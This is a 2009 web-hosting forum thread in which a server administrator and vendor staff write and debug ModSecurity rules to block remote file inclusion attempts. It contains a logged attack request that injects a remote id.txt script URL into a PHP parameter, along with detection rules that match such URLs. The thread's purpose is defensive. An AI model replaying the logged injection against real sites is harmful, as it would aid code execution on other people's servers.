Rule for blocking name of scripts?

Sergio · **Joined:** Sat Jan 17, 2009 2:19 pm **Posts:** 99

Hi,
I have seen that in my server a lot of attacks are trying to inyect code from TXT files located in a remote server.

I have made a research and found the following:
Since March 22, 2009, my server has received 36,297 attacks of this type. From this attacks only 21,506 were unique, so, 15,000 attacks were duplicate ones.

Also, all this attacks came from 3,131 different IPs, so, it will be about 10 different attacks from the same IP.
On the other hand, all this attacks involved 1,785 unique domains, so, about 20 different type of TXT scripts were used on each domain.
And finally, my research found that only 456 scripts names were used.

So, my question is, what rule I can tweak in order to have a file called MALWARE_SCRIPT.TXT that could check on scripts file name first, if the name is not in there, then it could check on the MALWARE_BLACKLIST.TXT for the domain, if it is not there then check the IP on the MALWARE_IPBANNED.TXT and if it is not there then to search on the other rules.

Is this possible?

I think that this will do a security check faster on the server, as it will check the rules with the lowest files first.

Regards,
Sergio

mikeshinn · **Posted:** Thu Sep 03, 2009 2:24 pm

Sure is possible. And not a bad idea - please send me whatever list your put together along with any domain names, logs etc. you care to share.

So, on to your request, you can create the MALWARE_SCRIPT.TXT system by doing this:

1) create a file called 9999_asl_local_malware.conf in /etc/httpd/modsecurity.d

2) Add this to the file:

SecRule REQUEST_URI "@pmFromFile malware-script.txt" \ "capture,t:replaceNulls,t:htmlEntityDecode,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:999999,rev:1,severity:2,msg:'Local Malware Script Blacklist: Malware Script detected in URL',logdata:'%{TX.0}'"

3) go create this file with your list of file names:

/etc/httpd/modsecurity.d/malware-script.txt

4) make sure ALL the malware script names are in lowercase in that file (badscript.txt is OK, BadScript.txt is not). That rule automatically converts anything to lowercase to prevent evasion attacks like FoOBaR, fOObaR, etc.

5) restart apache

And please let us know how it works.

faris · **Joined:** Thu Dec 09, 2004 11:19 am **Posts:** 1876

Sergio -- excellent research. This is very useful.

Scott -- way to go! This will be very useful, I think, as an additional set of rules.

Feature request: Please can we have it as a disable-able option in the next ASL release?
Feature request reminder: Please can we have domain-blacklist.txt as a disable-able option in the next ASL release?

Thanks,

Faris.

Sergio · **Joined:** Sat Jan 17, 2009 2:19 pm **Posts:** 99

Thank you Mike, I will implement this rule in my server and I will let you know.

May I can send you the info that I have to support@atomicorp.com, or do you have another email where to send you the info?

@ Faris, thank you for your comments.

Regards,
Sergio

mikeshinn · **Posted:** Thu Sep 03, 2009 4:04 pm

Quote:

May I can send you the info that I have to support@atomicorp.com, or do you have another email where to send you the info?

Thats a good place to send them. Also, on the offhand chance our collective antispam filters flag it as spam (with all those bad domains it might trip something) go ahead and zip it up and put a password on the zip file.

Faris:

Quote:

Feature request: Please can we have it as a disable-able option in the next ASL release?
Feature request reminder: Please can we have domain-blacklist.txt as a disable-able option in the next ASL release?

We'll discuss it at the WAF GUI meeting how to do manage this.

Right now you can disable the domain-blacklist rules by just running these commands:

asl -dr 300000
asl -dr 300001

Sergio · **Joined:** Sat Jan 17, 2009 2:19 pm **Posts:** 99

Ok, email is sent.

Regards,
Sergio

Sergio · **Joined:** Sat Jan 17, 2009 2:19 pm **Posts:** 99

Ok, I have implemented the Rule, I got an error on the begining but it was fixed. I will post how this works.

Regards,
Sergio

Sergio · **Joined:** Sat Jan 17, 2009 2:19 pm **Posts:** 99

Well, after checking all the attacks that I have since I implemented the new rule, it didn't work as I wanted.

Look at the following info:

Quote:

date:2009-09-03 20:00:47
IP: 204.3.129.73
GET: /blogweb//index.php?_REQUEST=http://civitatis.superweb.ws/game/id.txt?? HTTP/1.0
HOST: SERVER.com
MOD SEC MESSAGE: Access denied with code 406 (phase 2). Matched phrase "204.3.129.73" at REMOTE_ADDR. [file "/usr/local/apache/conf/modsec_rules/00_asl_rbl.conf"] [line "6"] [id "350000"] [rev "2"] [msg "MY OWN BLACKLIST: IP is on My IPs Blacklist"] [severity "ERROR"]
MOD SEC ERROR: 406

I was expecting that the new rule will trigger the MATCHED PHRASE of "id.txt" file name but continued with the following rule

The good thing is that my other new rule with all the black listed IPs is working real nice.

Any idea of why it didn't catch the file name?

Regards,
Sergio

mikeshinn · **Posted:** Fri Sep 04, 2009 12:55 pm

Did the malwarescript rule come after your IP blacklist? If so, the first match wins and the process stops.

Sergio · **Joined:** Sat Jan 17, 2009 2:19 pm **Posts:** 99

mikeshinn wrote:

Did the malwarescript rule come after your IP blacklist? If so, the first match wins and the process stops.

Hi Mike,
no, the first rule that I have is the malwarescript, look at my definitions:

Quote:

#Script Name Rules
Include /usr/local/apache/conf/modsec_rules/9999_asl_local_malware.conf

#My own IP blacklist
Include /usr/local/apache/conf/modsec_rules/00_asl_rbl.conf

#Whitelisting Rules
Include /usr/local/apache/conf/modsec_rules/00_asl_whitelist.conf

#Exclusion Rules
Include /usr/local/apache/conf/modsec_rules/05_asl_exclude.conf

#Scan uplaoded files with clamav
Include /usr/local/apache/conf/modsec_rules/05_asl_scanner.conf

#Malware Blacklist Rules
Include /usr/local/apache/conf/modsec_rules/10_asl_antimalware.conf

#Web Application Protection Rules
Include /usr/local/apache/conf/modsec_rules/10_asl_rules.conf

#Nueva regla para tarjeta de credito
Include /usr/local/apache/conf/modsec_rules/11_asl_data_loss.conf

#Bad Useragent Signatures
Include /usr/local/apache/conf/modsec_rules/20_asl_useragents.conf

#Additional Malware Blacklisting Rules
Include /usr/local/apache/conf/modsec_rules/30_asl_antimalware.conf

#Anti-spam Signatures
Include /usr/local/apache/conf/modsec_rules/30_asl_antispam.conf
Include /usr/local/apache/conf/modsec_rules/30_asl_antispam_referrer.conf

#Enhanced Apache 2.x rules
Include /usr/local/apache/conf/modsec_rules/40_asl_apache2-rules.conf

#Anti Rootkit Signatures
Include /usr/local/apache/conf/modsec_rules/50_asl_rootkits.conf

#"Google Hacks" signatures
Include /usr/local/apache/conf/modsec_rules/60_asl_recons.conf

Include /usr/local/apache/conf/modsec_rules/98_asl_jitp.conf

Include /usr/local/apache/conf/modsec_rules/99_asl_exclude.conf

#Just In Time Patches
Include /usr/local/apache/conf/modsec_rules/99_asl_jitp.conf

#Trusted domains
Include /usr/local/apache/conf/modsec_rules/trusted-domains.conf

As you can see, it is the first rule in my config file. What else could be my error?

Regards,
Sergio

mikeshinn · **Posted:** Sat Sep 05, 2009 8:26 am

It looks like have your own configs, so its hard to say what could be wrong. You may have something wrong in your defaultaction, so start with a very simple rule and make sure you can get that to work first:

SecRule REQUEST_URI /foobar

If that doesnt block, then you have something wrong with your fundamental configuration and I'd recommend you use our configuration which is tested and works.

Heres an updated version of the injection rule if you want to keep it limited to just the actual injection cases:

#Master list of known malware script file names
SecRule REQUEST_URI "(?:ogg|gopher|zlib|(?:ht|f)tps?)\:/" \
"chain,capture,t:replaceNulls,t:htmlEntityDecode,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390500,rev:1,severity:2,msg:'Atomicorp.com Malware Script Blacklist: Malware Script detected in URL',logdata:'%{TX.0}'"
SecRule REQUEST_URI "@pmFromFile malware_scripts.txt"

One thing to keep in mind, you probably dont need this rule because with URL injections there is already a global set of rules to catch injections. So where you might have better luck is with ARGS, but you run a higher chance of false positives.

Sergio · **Joined:** Sat Jan 17, 2009 2:19 pm **Posts:** 99

Michael,
I tought that I had your configuration, lol. A little bit modified as my server is CPanel but basically all the rules are the same.

If you don't mind, can you point me where is your configuration and see to set them in my server? BIG THANKS.

On the other hand, may be if I explain to you what I am trying to inted to do with this rule, you can tell me if I am wrong on what I want...

Take as an example the following action:

Code:

/blogweb//index.php?_REQUEST=http://civitatis.superweb.ws/game/id.txt?? HTTP/1.0

0. (Check the whitelist first and stops any checks).
1. So, for me it will be easier to start checking from the end, so the first part to test on the action is to search for "/id.txt?", if it is find in the malware-script.txt, then the process stops and gives a 406 error.
2. If the script wasn't find, then we can check for the domain name "civitatis.superweb.ws/", if it is located in the malware-blacklist.txt, then the process stops and gives 406 error.
3. Then check for black listed IPs in malware-blacklistIP.txt, if the connection IP is located there, stop the process and gives 406 error.
4 If all the above fails continue with the other rules.

What I intend to do is to check for the faster things first, so, the script file is the lowest in size of all the malware files and is also, in my case, the most used as a lot of the hack attempts are the ones that tries to inject code via scripts.

Am I wrong?

Sergio · **Joined:** Sat Jan 17, 2009 2:19 pm **Posts:** 99

Quote:

On your other rule, the malware script, I think your problem is that you are just missing a default action and the phase in which the rules runs. All our rule files sets define their phases and actions, sometimes in the rules and always as a default action, so any custom rules after ours always inherit these conditions. If you are loading your rules before ours, then you need to define an action for the system to take when the rule matches and the phase in which the rule should act. Either in the rule itself:

#Master list of known malware script file names
SecRule REQUEST_URI "(?:ogg|gopher|zlib|(?:ht|f)tps?)\:/" \
"deny,log,phase:2,chain,capture,t:replaceNulls,t:htmlEntityDecode,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390500,rev:1,severity:2,msg:'Atomicorp.com Malware Script Blacklist: Malware Script detected in URL',logdata:'%{TX.0}'"
SecRule REQUEST_URI "@pmFromFile malware_scripts.txt"

Or set it as a default before the rule:

SecDefaultAction "log,deny,auditlog,phase:2,status:403,t:lowercase,t:replaceNulls,t:compressWhitespace"

Thank you Mike,
I will try this new rule and see how this works.

Regards,
Sergio

mikeshinn · **Posted:** Sat Sep 05, 2009 3:59 pm

And dont forget to try some even simpler rules just so you can get the hang of the basic principles of actions and phases. If you can get those to fire, then work up to more complex rules that way you can reduce the variables involves in troubleshooting. Once the basics are working you can rule them out as the root cause of the problem and jump to more complex rules, then more complex expressions, etc.

Reduce the variables = Reduce the effort troubleshooting.

Sergio · **Joined:** Sat Jan 17, 2009 2:19 pm **Posts:** 99

Hello Mike,
you know I have set the script rule in two different servers and in one it is working and in the other (the first one that I set the new rule) is not, for sure it has to be something in my configuration, but I can't find where it is, I will do a better research.

On the other hand, I have been blocking hundred of attacks lately and the data I am gathering from them is really nice, I had a lot of IPs where the attacks are comming, my rule for blocking IPs is working real nice and I have decided to put this 406 sign:

Attachment:

406.jpg [ 30.38 KiB | Viewed 4224 times ]

Do you think it will attrack more attacks ? lol

Regards,
Sergio

Rule for blocking name of scripts?

Who is online